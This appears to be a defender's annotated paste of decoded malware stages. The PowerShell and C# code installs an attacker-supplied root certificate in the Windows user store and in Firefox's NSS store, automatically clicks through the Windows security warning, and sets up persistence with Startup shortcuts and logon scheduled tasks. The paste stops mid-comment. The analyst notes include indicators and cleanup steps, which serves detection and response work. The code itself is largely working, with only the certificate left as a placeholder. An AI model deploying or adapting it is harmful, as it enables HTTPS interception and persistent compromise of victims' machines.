James_inthe_box

Further decoded

Dec 11th, 2018
  1. function IxwlznPssNNPP{
  # Analyst notes (defender view). Stage 1: compiles the inline C# below with
  # Add-Type and calls it once. What the embedded class does:
  #  - MdZnUIVph: base64-decodes the string it is given (the "%CERT%" token at the
  #    call site looks like a template placeholder that the dropper fills in), opens
  #    the CurrentUser\Root certificate store read-write and, if the certificate is
  #    not already present, adds it — i.e. it installs an attacker-supplied ROOT CA
  #    for the current user.
  #  - Before store.Add it starts a thread (jinJTAGRFjJN) that spins, without any
  #    sleep, until a top-level window of class "#32770" (the standard Windows
  #    dialog class) owned by a process whose image name contains "csrss",
  #    "certutil" or "powershell" exists; it then brings that dialog to the
  #    foreground and sends message 0x00F5 (BM_CLICK) to every child control via
  #    EnumChildWindows. Net effect: the security warning Windows shows when a root
  #    CA is added to the user store is clicked through without user interaction.
  #    thread.Join() blocks until such a dialog has been found.
  #  - zlZtvaJq resolves the window's PID with GetWindowThreadProcessId and walks a
  #    Toolhelp32 process snapshot to get the image name.
  # Detection / response: watch for additions under the current-user Root store
  # (HKCU\Software\Microsoft\SystemCertificates\Root\Certificates), for PowerShell
  # using Add-Type to import user32 EnumWindows/SendMessage, and audit
  # CurrentUser\Root for CAs that are not expected. Remove the rogue CA from every
  # affected user profile; the Firefox NSS store is handled by the next function.
  2. Add-Type @"
  3. using System;
  4. using System.Text;
  5. using System.Runtime.InteropServices;
  6. using System.Diagnostics;
  7. using System.Security.Cryptography.X509Certificates;
  8. using System.Threading;
  9.  
  10. public static class uDWozt
  11. {
  12. public class brNXwO
  13. {
  14. public string Wndclass;
  15. public string Title;
  16. public string Process;
  17. public IntPtr hWnd;
  18. }
  19.  
  20. private delegate bool KIzxk(IntPtr hWnd, ref brNXwO data);
  21.  
  22. [DllImport("user32.dll")]
  23. [return: MarshalAs(UnmanagedType.Bool)]
  24. private static extern bool EnumWindows(KIzxk lpEnumFunc, ref brNXwO data);
  25.  
  26. [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
  27. public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount);
  28.  
  29. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  30. public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);
  31.  
  32. [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
  33. static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
  34.  
  35. [DllImport("user32.dll")]
  36. [return: MarshalAs(UnmanagedType.Bool)]
  37. static extern bool SetForegroundWindow(IntPtr hWnd);
  38.  
  39. public delegate bool uDP(IntPtr hwnd, IntPtr lParam);
  40.  
  41. [DllImport("user32")]
  42. [return: MarshalAs(UnmanagedType.Bool)]
  43. public static extern bool EnumChildWindows(IntPtr window, uDP callback, IntPtr lParam);
  44.  
  45. [DllImport("user32.dll", CharSet = CharSet.Auto)]
  46. static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam);
  47.  
  48. [Flags]
  49. private enum SnapshotFlags : uint
  50. {
  51. HeapList = 0x00000001,
  52. Process = 0x00000002,
  53. Thread = 0x00000004,
  54. Module = 0x00000008,
  55. Module32 = 0x00000010,
  56. Inherit = 0x80000000,
  57. All = 0x0000001F,
  58. NoHeaps = 0x40000000
  59. }
  60. //inner struct used only internally
  61. [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
  62. private struct PROCESSENTRY32
  63. {
  64. const int MAX_PATH = 260;
  65. internal UInt32 dwSize;
  66. internal UInt32 cntUsage;
  67. internal UInt32 th32ProcessID;
  68. internal IntPtr th32DefaultHeapID;
  69. internal UInt32 th32ModuleID;
  70. internal UInt32 cntThreads;
  71. internal UInt32 th32ParentProcessID;
  72. internal Int32 pcPriClassBase;
  73. internal UInt32 dwFlags;
  74. [MarshalAs(UnmanagedType.ByValTStr, SizeConst = MAX_PATH)]
  75. internal string szExeFile;
  76. }
  77.  
  78. [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
  79. static extern IntPtr CreateToolhelp32Snapshot([In]UInt32 dwFlags, [In]UInt32 th32ProcessID);
  80.  
  81. [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
  82. static extern bool Process32First([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);
  83.  
  84. [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
  85. static extern bool Process32Next([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);
  86.  
  87. [DllImport("kernel32", SetLastError = true)]
  88. [return: MarshalAs(UnmanagedType.Bool)]
  89. private static extern bool CloseHandle([In] IntPtr hObject);
  90.  
  91. const int BM_CL = 0x00F5;
  92.  
  93. public static byte[] lIxrqOO(String sCert)
  94. {
  95. return Convert.FromBase64String(sCert);
  96. }
  97.  
  98. public static void MdZnUIVph(String sCert){
  99. System.Console.WriteLine("[Win32]::Start()");
  100. byte[] bCert = lIxrqOO(sCert);
  101. if (bCert != null)
  102. {
  103. X509Certificate2 certificate = new X509Certificate2(bCert);
  104. X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser);
  105. store.Open(OpenFlags.ReadWrite);
  106. if (!store.Certificates.Contains(certificate))
  107. {
  108. Thread thread = new Thread(jinJTAGRFjJN);
  109. thread.Start();
  110. store.Add(certificate);
  111. thread.Join();
  112. }
  113. store.Close();
  114. }
  115. }
  116.  
  117. public static void jinJTAGRFjJN()
  118. {
  119. System.Console.WriteLine("[Win32]::SearchDialog()");
  120. IntPtr hWnd;
  121. do{
  122. hWnd = UANP("#32770",String.Empty);
  123. if (!hWnd.Equals(IntPtr.Zero))
  124. {
  125. System.Console.WriteLine("Founded hWnd=0x{0:X}",hWnd);
  126. break;
  127. }else
  128. {
  129. hWnd=IntPtr.Zero;
  130. System.Console.WriteLine("Try again find window");
  131. }
  132. }while (hWnd.Equals(IntPtr.Zero));
  133. System.Console.WriteLine("Dialog window founded");
  134. SetForegroundWindow(hWnd);
  135. uDP childProc = new uDP(Sqvkzka);
  136. EnumChildWindows(hWnd, childProc, IntPtr.Zero);
  137. }
  138.  
  139. public static IntPtr UANP(string wndclass, string title)
  140. {
  141. brNXwO sd = new brNXwO();
  142. sd.Wndclass = wndclass;
  143. sd.Title = title;
  144. sd.hWnd=IntPtr.Zero;
  145. System.Console.WriteLine("EnumWindow -|");
  146. EnumWindows(new KIzxk(QfEgqbiwLLE), ref sd);
  147. return sd.hWnd;
  148. }
  149.  
  150. public static bool QfEgqbiwLLE(IntPtr hWnd, ref brNXwO data)
  151. {
  152. StringBuilder title = new StringBuilder(1024);
  153. StringBuilder className = new StringBuilder(1024);
  154. GetWindowText(hWnd, title, title.Capacity);
  155. GetClassName(hWnd, className, className.Capacity);
  156. String sEN=zlZtvaJq(hWnd).ToLower();
  157. if((!data.Wndclass.Equals(String.Empty) && className.ToString().StartsWith(data.Wndclass)) || (!data.Title.Equals(String.Empty) && title.ToString().StartsWith(data.Title)))
  158. {
  159. System.Console.WriteLine(" |- hWnd=0x{0:X}; Class={1}; Title={2}; Process={3}",hWnd,className.ToString(),title.ToString(),sEN);
  160. if(sEN.Contains("csrss") || sEN.Contains("certutil") || sEN.Contains("powershell"))
  161. {
  162. data.hWnd = hWnd;
  163. return false;
  164. }
  165. }
  166.  
  167. return true;
  168. }
  169.  
  170. public static String zlZtvaJq(IntPtr cQzoivDyDVP){
  171. uint LSMhtexN = 0;
  172. uint threadID = GetWindowThreadProcessId(cQzoivDyDVP, out LSMhtexN);
  173. String sProc = null;
  174. IntPtr handleToSnapshot = IntPtr.Zero;
  175. try
  176. {
  177. PROCESSENTRY32 uRgD = new PROCESSENTRY32();
  178. uRgD.dwSize = (UInt32)Marshal.SizeOf(typeof(PROCESSENTRY32));
  179. handleToSnapshot = CreateToolhelp32Snapshot((uint)SnapshotFlags.Process, 0);
  180. if (Process32First(handleToSnapshot, ref uRgD))
  181. {
  182. do
  183. {
  184. if (LSMhtexN == uRgD.th32ProcessID)
  185. {
  186. sProc = uRgD.szExeFile;
  187. break;
  188. }
  189. } while (Process32Next(handleToSnapshot, ref uRgD));
  190. }
  191. else
  192. {
  193. throw new ApplicationException(string.Format("Failed with win32 error code {0}", Marshal.GetLastWin32Error()));
  194. }
  195. }
  196. catch (Exception ex)
  197. {
  198. throw new ApplicationException("Can't get the process.", ex);
  199. }
  200. finally
  201. {
  202. CloseHandle(handleToSnapshot);
  203. }
  204. return sProc;
  205. }
  206. public static bool Sqvkzka(IntPtr hWnd, IntPtr lParam)
  207. {
  208. SendMessage(hWnd, BM_CL, IntPtr.Zero, IntPtr.Zero);
  209. return true;
  210. }
  211. }
  212. "@;
  # "%CERT%" is a placeholder: the real sample carries the base64 DER certificate
  # here (confirm against the original dropper).
  213. [uDWozt]::MdZnUIVph("%CERT%");
  # 'exit' inside a function ends the whole script, so nothing after the call on the
  # next line would run in the same process. The remaining functions on this page
  # therefore look like separately delivered stages concatenated while decoding.
  214. exit
  215. }
  216. IxwlznPssNNPP # stage 1 entry: installs the rogue root CA into CurrentUser\Root, then exits the script
  217.  
  218. function qWydooxsfcuX{
  # Analyst notes (defender view). Stage 2: a second inline C# helper that pushes
  # the same certificate into Firefox's own NSS trust store, which does not consult
  # the Windows certificate store. Flow of yXKVDNlNplVzraF (the public entry point):
  #  1. GetProfile: first "*.default" directory under %APPDATA%\Mozilla\Firefox\Profiles.
  #  2. GetIP: Firefox install directory from HKLM\SOFTWARE\Mozilla\Mozilla Firefox or
  #     HKLM\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox (the embedded comment calls
  #     the Wow6432Node key the "64bit" location; it is the 32-bit view on a 64-bit OS),
  #     falling back to the two default "Program Files" firefox.exe paths.
  #  3. Switches the working directory to the install dir, LoadLibrary()s every *.dll
  #     there except breakpadinjector.dll, then nss3.dll, and resolves NSS exports by
  #     name with GetProcAddress: NSS_Initialize, CERT_GetDefaultCertDB,
  #     CERT_ImportCerts, CERT_ChangeCertTrust, CERT_DestroyCertArray, NSS_Shutdown.
  #  4. NSS_Initialize("sql:<profile>", "", "", "secmod.db", NSS_INIT_OPTIMIZESPACE),
  #     imports the DER certificate (SECItem type 3) with usage 11 (certUsageAnyCA in
  #     the enum below), then CERT_ChangeCertTrust with 0x10 (the NSS CERTDB_TRUSTED_CA
  #     bit) in all three trust words, so Firefox trusts the attacker CA for SSL,
  #     e-mail and object-signing purposes.
  # The argument is again the "%CERT%" template placeholder. The first log line
  # prints the process bitness; loading nss3.dll requires it to match Firefox's.
  # Detection / response: a PowerShell process loading nss3.dll and the rest of the
  # Firefox install directory; on cleanup remove the CA from the NSS certificate
  # database of every Firefox profile as well as from the Windows user store.
  219. Add-Type @"
  220. using System;
  221. using System.IO;
  222. using Microsoft.Win32;
  223. using System.Runtime.InteropServices;
  224. using System.ComponentModel;
  225.  
  226. public sealed class VvvluVYvCVHZcKJ
  227. {
  228. private static volatile VvvluVYvCVHZcKJ bWQOycQsqwujTX;
  229. private static object FjuSmxcUz = new Object();
  230. public static VvvluVYvCVHZcKJ yXpWzzNyofAXFw()
  231. {
  232. if (bWQOycQsqwujTX == null)
  233. {
  234. lock (FjuSmxcUz)
  235. {
  236. if (bWQOycQsqwujTX == null)
  237. bWQOycQsqwujTX = new VvvluVYvCVHZcKJ();
  238. }
  239. }
  240. return bWQOycQsqwujTX;
  241. }
  242.  
  243. const int GlPtNsgUc=0;
  244.  
  245. [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
  246. static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);
  247.  
  248. private static IntPtr sVoGpYpL(string libPath)
  249. {
  250. if (String.IsNullOrEmpty(libPath))
  251. throw new ArgumentNullException("libPath");
  252.  
  253. IntPtr moduleHandle = LoadLibrary(libPath);
  254. if (moduleHandle == IntPtr.Zero)
  255. {
  256. int lasterror = Marshal.GetLastWin32Error();
  257. System.Console.WriteLine(String.Format("Last error: 0x{0:X}",lasterror));
  258. Win32Exception innerEx = new Win32Exception(lasterror);
  259. innerEx.Data.Add("LastWin32Error", lasterror);
  260. throw new Exception("can't load DLL " + libPath, innerEx);
  261. }
  262. return moduleHandle;
  263. }
  264.  
  265. [DllImport("kernel32.dll")]
  266. public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
  267. //Constants
  268. const uint NSS_INIT_READONLY=0x1;
  269. const uint NSS_INIT_NOCERTDB = 0x2;
  270. const uint NSS_INIT_NOMODDB = 0x4;
  271. const uint NSS_INIT_FORCEOPEN = 0x8;
  272. const uint NSS_INIT_NOROOTINIT = 0x10;
  273. const uint NSS_INIT_OPTIMIZESPACE = 0x20;
  274. const uint NSS_INIT_PK11THREADSAFE = 0x40;
  275. const uint NSS_INIT_PK11RELOAD = 0x80;
  276. const uint NSS_INIT_NOPK11FINALIZE = 0x100;
  277. const uint NSS_INIT_RESERVED = 0x200;
  278. const uint NSS_INIT_COOPERATE = NSS_INIT_PK11THREADSAFE | NSS_INIT_PK11RELOAD | NSS_INIT_NOPK11FINALIZE | NSS_INIT_RESERVED;
  279.  
  280. const string SECMOD_DB = "secmod.db";
  281. //Structures
  282. [StructLayout(LayoutKind.Sequential)]
  283. public struct SECItem
  284. {
  285. public uint iType;
  286. public IntPtr bData;
  287. public uint iDataLen;
  288. }
  289.  
  290. [StructLayout(LayoutKind.Sequential)]
  291. private struct CertTrusts
  292. {
  293. public int iSite;
  294. public int iEmail;
  295. public int iSoft;
  296. }
  297.  
  298. private enum SECCertUsage
  299. {
  300. certUsageSSLClient = 0,
  301. certUsageSSLServer = 1,
  302. certUsageSSLServerWithStepUp = 2,
  303. certUsageSSLCA = 3,
  304. certUsageEmailSigner = 4,
  305. certUsageEmailRecipient = 5,
  306. certUsageObjectSigner = 6,
  307. certUsageUserCertImport = 7,
  308. certUsageVerifyCA = 8,
  309. certUsageProtectedObjectSigner = 9,
  310. certUsageStatusResponder = 10,
  311. certUsageAnyCA = 11
  312. }
  313. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  314. private delegate int SAHQOjSKIQuqauu(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags);
  315.  
  316. private int jMqvNrdsjLvv(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags)
  317. {
  318. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "NSS_Initialize");
  319. SAHQOjSKIQuqauu ptr = (SAHQOjSKIQuqauu)Marshal.GetDelegateForFunctionPointer(pProc, typeof(SAHQOjSKIQuqauu));
  320. return ptr(sConfigDir, certPrefix, keyPrefix, secModName, flags);
  321. }
  322.  
  323. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  324. private delegate IntPtr NIYpPCjCBxFfBC();
  325. private IntPtr CNdGzRYooz()
  326. {
  327. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_GetDefaultCertDB");
  328. NIYpPCjCBxFfBC ptr = (NIYpPCjCBxFfBC)Marshal.GetDelegateForFunctionPointer(pProc, typeof(NIYpPCjCBxFfBC));
  329. return ptr();
  330. }
  331.  
  332. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  333. private delegate IntPtr sTBBLA();
  334. private IntPtr jYJvrdt()
  335. {
  336. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "NSS_Shutdown");
  337. sTBBLA ptr = (sTBBLA)Marshal.GetDelegateForFunctionPointer(pProc, typeof(sTBBLA));
  338. return ptr();
  339. }
  340.  
  341. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  342. private delegate int mxfz(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname);
  343. private int zAkHNfkzyckVBxn(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname)
  344. {
  345. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_ImportCerts");
  346. mxfz ptr = (mxfz)Marshal.GetDelegateForFunctionPointer(pProc, typeof(mxfz));
  347. return ptr(certdb, usage, ncerts, ref derCerts, ref retCerts, keepCerts, caOnly, nickname);
  348. }
  349.  
  350. private delegate int UJdXr(IntPtr certdb, IntPtr cert, ref CertTrusts trust);
  351. private int rJbhRgnUdJYH(IntPtr certdb, IntPtr cert, ref CertTrusts trust)
  352. {
  353. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_ChangeCertTrust");
  354. UJdXr ptr = (UJdXr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(UJdXr));
  355. return ptr(certdb, cert, ref trust);
  356. }
  357.  
  358. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  359. public delegate int BxDVnEb(IntPtr cert, uint ncerts);
  360. private int GMMnJgiwqS(IntPtr cert, uint ncerts)
  361. {
  362. IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_DestroyCertArray");
  363. BxDVnEb ptr = (BxDVnEb)Marshal.GetDelegateForFunctionPointer(pProc, typeof(BxDVnEb));
  364. return ptr(cert, ncerts);
  365. }
  366.  
  367. private IntPtr xHkdzDjqqFO = IntPtr.Zero;
  368.  
  369. public Boolean yXKVDNlNplVzraF(String sCert){
  370. System.Console.WriteLine(String.Format("VvvluVYvCVHZcKJ Start. Process {0}-bit",IntPtr.Size * 8));
  371. String sProfile = GetProfile();
  372. if (String.IsNullOrEmpty(sProfile))
  373. {
  374. System.Console.WriteLine("Profile not found");
  375. return false;
  376. }
  377. System.Console.WriteLine("Profile path="+sProfile);
  378. byte[] bCert = GetCertAsByteArray(sCert);
  379. IntPtr ipCert = Marshal.AllocHGlobal(bCert.Length);
  380. System.Console.WriteLine("Unpack cert OK");
  381. try
  382. {
  383. DirectoryInfo diInstallPath = GetIP();
  384. if (diInstallPath == null)
  385. {
  386. System.Console.WriteLine("diInstallPath is null");
  387. String ffexe = @"C:\Program Files\Mozilla Firefox\firefox.exe";
  388. if (File.Exists(ffexe))
  389. {
  390. diInstallPath = new DirectoryInfo(Path.GetDirectoryName(ffexe));
  391. System.Console.WriteLine("Path found: "+Path.GetDirectoryName(ffexe));
  392. }
  393. else
  394. {
  395. ffexe = @"C:\Program Files (x86)\Mozilla Firefox\firefox.exe";
  396. if (File.Exists(ffexe))
  397. {
  398. diInstallPath = new DirectoryInfo(Path.GetDirectoryName(ffexe));
  399. System.Console.WriteLine("Path found: "+Path.GetDirectoryName(ffexe));
  400. }
  401. }
  402. }
  403. String sCurrentDirectory = Directory.GetCurrentDirectory();
  404. Directory.SetCurrentDirectory(diInstallPath.FullName);
  405. System.Console.WriteLine("Install path="+diInstallPath.FullName);
  406. foreach(FileInfo fiDll in diInstallPath.GetFiles("*.dll"))
  407. {
  408. if (fiDll.Name.Equals("breakpadinjector.dll")) continue;
  409. try{
  410. sVoGpYpL(fiDll.FullName);
  411. }catch (Exception ex){
  412. System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
  413. }
  414. }
  415. xHkdzDjqqFO = sVoGpYpL(diInstallPath.FullName + "\\nss3.dll");
  416. if (xHkdzDjqqFO.Equals(IntPtr.Zero))
  417. {
  418. System.Console.WriteLine("Firefox install directory not found");
  419. return false;
  420. }
  421. System.Console.WriteLine("Init dlls OK");
  422. Directory.SetCurrentDirectory(sCurrentDirectory);
  423. //Init cert
  424. Marshal.Copy(bCert, 0, ipCert, bCert.Length);
  425. SECItem CertItem = new SECItem();
  426. CertItem.iType = 3;
  427. CertItem.bData = ipCert;
  428. CertItem.iDataLen = (uint)bCert.Length;
  429. SECItem[] aCertItem = new SECItem[1];
  430. aCertItem[0] = CertItem;
  431.  
  432. CertTrusts CertTrust = new CertTrusts();
  433. CertTrust.iSite = 0x10;
  434. CertTrust.iEmail = 0x10;
  435. CertTrust.iSoft = 0x10;
  436. System.Console.WriteLine("Init cert OK");
  437. //End init cert
  438. int status = jMqvNrdsjLvv("sql:"+sProfile, "", "", SECMOD_DB, NSS_INIT_OPTIMIZESPACE);
  439. if (status != GlPtNsgUc)
  440. {
  441. System.Console.WriteLine(String.Format("NSS_InitReadWrite ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
  442. return false;
  443. }
  444. IntPtr bd = CNdGzRYooz();
  445. if (bd == IntPtr.Zero)
  446. {
  447. System.Console.WriteLine("CERT_GetDefaultCertDB Failed");
  448. jYJvrdt();
  449. return false;
  450. }
  451. System.Console.WriteLine("CERT_GetDefaultCertDB OK");
  452. IntPtr CertToImport = new IntPtr();
  453. IntPtr[] aCertToImport = new IntPtr[1];
  454. status = zAkHNfkzyckVBxn(bd, 11, 1, ref aCertItem, ref CertToImport, 1, 0, IntPtr.Zero);
  455. if (status != GlPtNsgUc)
  456. {
  457. System.Console.WriteLine(String.Format("CERT_ImportCerts ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
  458. jYJvrdt();
  459. return false;
  460. }
  461. System.Console.WriteLine("CERT_ImportCerts OK");
  462. Marshal.Copy(CertToImport, aCertToImport, 0, 1);
  463. status = rJbhRgnUdJYH(bd, aCertToImport[0], ref CertTrust);
  464. if ( status != GlPtNsgUc)
  465. {
  466. System.Console.WriteLine(String.Format("CERT_ChangeCertTrust ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
  467. jYJvrdt();
  468. return false;
  469. };
  470. System.Console.WriteLine("CERT_ChangeCertTrust OK");
  471. GMMnJgiwqS(CertToImport, 1);
  472. System.Console.WriteLine("Add cert OK");
  473. }
  474. catch (Exception ex){
  475. System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
  476. }
  477. finally
  478. {
  479. jYJvrdt();
  480. }
  481. return true;
  482. }
  483. private String GetProfile()
  484. {
  485. String FFProfile = Path.Combine(Environment.GetEnvironmentVariable("APPDATA"), @"Mozilla\Firefox\Profiles");
  486. if (Directory.Exists(FFProfile))
  487. {
  488. if (Directory.GetDirectories(FFProfile, "*.default").Length > 0)
  489. {
  490. return Directory.GetDirectories(FFProfile, "*.default")[0];
  491. }
  492. }
  493. return "";
  494. }
  495. public byte[] GetCertAsByteArray(String sCert)
  496. {
  497. try
  498. {
  499. return Convert.FromBase64String(sCert);
  500. }
  501. catch (Exception ex){
  502. System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
  503. }
  504. return null;
  505. }
  506. private DirectoryInfo GetIP()
  507. {
  508. DirectoryInfo fp = null;
  509. // get firefox path from registry
  510. // we'll search the 32bit install location
  511. RegistryKey localMachine1 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Mozilla\Mozilla Firefox", false);
  512. // and lets try the 64bit install location just in case
  513. RegistryKey localMachine2 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox", false);
  514.  
  515. if (localMachine1 != null)
  516. {
  517. try
  518. {
  519. string[] installedVersions = localMachine1.GetSubKeyNames();
  520. // we'll take the first installed version, people normally only have one
  521. if (installedVersions.Length == 0)
  522. throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");
  523.  
  524. RegistryKey mainInstall = localMachine1.OpenSubKey(installedVersions[0]);
  525.  
  526. // get install directory
  527. string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null);
  528.  
  529. if (installString == null)
  530. throw new NullReferenceException("Install string was null");
  531.  
  532. fp = new DirectoryInfo(installString);
  533. }
  534. catch (Exception ex)
  535. {
  536. System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
  537. }
  538. }
  539. else if (localMachine2 != null)
  540. {
  541. try
  542. {
  543. string[] installedVersions = localMachine2.GetSubKeyNames();
  544. // we'll take the first installed version, people normally only have one
  545. if (installedVersions.Length == 0)
  546. throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");
  547.  
  548. RegistryKey mainInstall = localMachine2.OpenSubKey(installedVersions[0]);
  549.  
  550. // get install directory
  551. string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null);
  552.  
  553. if (installString == null)
  554. throw new NullReferenceException("Install string was null");
  555. fp = new DirectoryInfo(installString);
  556. }
  557. catch (Exception ex)
  558. {
  559. System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
  560. }
  561. }else{
  562. System.Console.WriteLine("Registry records not found");
  563. }
  564. return fp;
  565. }
  566. }
  567. "@;
  # Singleton accessor, then the NSS import with the "%CERT%" placeholder (see above).
  568. [VvvluVYvCVHZcKJ]::yXpWzzNyofAXFw().yXKVDNlNplVzraF("%CERT%");
  569. }
  570. qWydooxsfcuX # stage 2 entry: adds the same CA to the Firefox NSS trust store
  571.  
  572.  
  573. $SH_TYPE_SCHEDULED_TASK=1; # use the built-in ScheduledTasks PowerShell module
  574. $SH_TYPE_TASK_SCHEDULER=2; # use the downloaded Microsoft.Win32.TaskScheduler.dll (see InitScheduller)
  575. $schedulerType=$SH_TYPE_SCHEDULED_TASK; # default backend; re-assigned (function-locally) in ZjLBbVj
  576. function mWwT
  577. {
  # Unzip helper: extracts $zipfile into $destination. If %ALLUSERSPROFILE%\7za.exe
  # (C:\ProgramData\7za.exe on current Windows) is missing it downloads it from
  # chocolatey.org, swallowing any error, and runs it with "x -o<dest> -y <zip>";
  # when 7za is still unusable it falls back to the Shell.Application COM object's
  # copyhere. IoC: an unexpected 7za.exe in ProgramData.
  578. param([string]$zipfile, [string]$destination);
  579. $7z = Join-Path $env:ALLUSERSPROFILE '7za.exe';
  580. if (-NOT (Test-Path $7z)){
  581. Try
  582. {
  583. (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z);
  584. }
  585. Catch{}
  586. }
  587. if ($(Try { Test-Path $7z.trim() } Catch { $false })){
  588. Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
  589. }
  590. else{
  591. $shell = new-object -com shell.application;
  592. $zip = $shell.NameSpace($zipfile);
  593. foreach($item in $zip.items())
  594. {
  595. $shell.Namespace($destination).copyhere($item);
  596. }
  597. }
  598. }
  599.  
  600. function Add-Shortcut{
  # Creates a .lnk at $dest_path that launches $target_path (with optional
  # $arguments and working directory $work_path) via the WScript.Shell COM object.
  # Used below to drop persistence shortcuts into the user's Startup folder.
  # Creates the destination directory if needed, refuses a missing target and
  # never overwrites an existing shortcut.
  601. param([string]$target_path, [string]$dest_path, [string]$work_path, [string]$arguments="");
  602.  
  603. $_path=Split-Path $dest_path;
  604. if (-Not (Test-Path $_path)){
  605. mkdir -Force $_path;
  606. }
  607. if (-Not (Test-Path $target_path)){
  608. Write-Output "Can't add shortcut. Target path '$target_path' not found.";
  609. return;
  610. }
  611. if ((Test-Path $dest_path)){
  612. Write-Output "Can't add shortcut. Destination path '$dest_path' exist.";
  613. return;
  614. }
  615.  
  616. $_shell = New-Object -ComObject ("WScript.Shell");
  617. $_shortcut = $_shell.CreateShortcut($dest_path);
  618. $_shortcut.TargetPath=$target_path;
  619. if(-Not [String]::IsNullOrEmpty($arguments)){
  620. $_shortcut.Arguments=$arguments;
  621. }
  622. $_shortcut.WorkingDirectory=$work_path;
  623. $_shortcut.Save();
  624. }
  625.  
  626. function Base64ToFile
  627. {
  # Writes a base64-encoded payload to $file as raw bytes. Not called anywhere in
  # the visible script; presumably used by another stage.
  628. param([string]$file, [string]$string);
  629. $bytes=[System.Convert]::FromBase64String($string);
  630. #set-content -encoding byte $file -value $bytes;
  631. [IO.File]::WriteAllBytes($file, $bytes);
  632. }
  633. function RandomString{
  # Random alphanumeric (0-9A-Za-z) string of length between $min and $max-1
  # (Get-Random -Maximum is exclusive). Used for every dropped file, directory and
  # task name below, so artefact names differ per victim and cannot be matched
  # literally — match on location and behaviour instead.
  634. param([int]$min=5, [int]$max=15);
  635. return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_}));
  636. }
  637. function InitScheduller{
  # Chooses the scheduled-task backend. If the ScheduledTasks module can be
  # imported, returns $SH_TYPE_SCHEDULED_TASK. Otherwise (older PowerShell) it
  # downloads the taskscheduler 2.5.23 NuGet package from api.nuget.org to
  # %TEMP%\<random>.zip — retrying forever until nne reports success — unzips it
  # to %TEMP%\<random>, loads lib\net20\Microsoft.Win32.TaskScheduler.dll with
  # Assembly.LoadFile and returns $SH_TYPE_TASK_SCHEDULER.
  # IoC: a Microsoft.Win32.TaskScheduler.dll extracted under %TEMP%.
  638. try{
  639. Import-Module ScheduledTasks -ErrorAction Stop;
  640. return $SH_TYPE_SCHEDULED_TASK;
  641. }catch{
  642. $File=$env:Temp+'\'+(RandomString)+'.zip';
  643. $Dest=$env:Temp+'\'+(RandomString);
  644. while (!(nne 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {}
  645. if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null;
  646. mWwT $File $Dest;
  647. Remove-Item -Force $File;
  648. $TSAssembly=$Dest+'\lib\net20\Microsoft.Win32.TaskScheduler.dll';
  649. $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
  650. return $SH_TYPE_TASK_SCHEDULER;
  651. }
  652. }
  653. function FqCZvVAFIWkCT
  654. {
  # Persistence: registers and immediately starts a scheduled task $name that runs
  # $cmd $params in $dir at every logon of the current user ($env:username),
